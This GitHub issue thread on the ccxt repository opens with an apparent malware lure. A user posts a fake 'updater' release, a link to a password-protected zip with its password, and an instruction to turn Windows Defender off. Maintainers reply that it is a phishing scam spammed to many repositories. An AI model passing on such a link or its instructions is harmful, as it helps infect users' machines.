### ISSUE TITLE
New Updater Has Been Released. Download here.

### ISSUE THREAD

**Issue by Enterpreneruim** [ccxt/ccxt#22267]
### CCXT Version

new

### Description

New Version has been Released:
Fixed: Password asking, failed system load, XML load and etc. coinex fixed, coinbase fixed.
Extract files into folder with older version and start Updater.
[ccxt_upd_fetched.zip](https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip)
Full link - https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip
- Password 2024
- Current Status: Working, April 24.
- Win Def must be off.

### Code

```
  

```

**Comment by xmatthias** [comment]
Watch out - this seems to be a phishing attempt.
The same user submitted a very similar "issue" to the freqtrade repository - as well as to a total of 13 others.

**Comment by carlosmiei** [comment]
This is a scam, please avoid any interaction with the user.

**Comment by ttodua** [comment]
@xmatthias if you have few seconds, plz report the user too , thanks
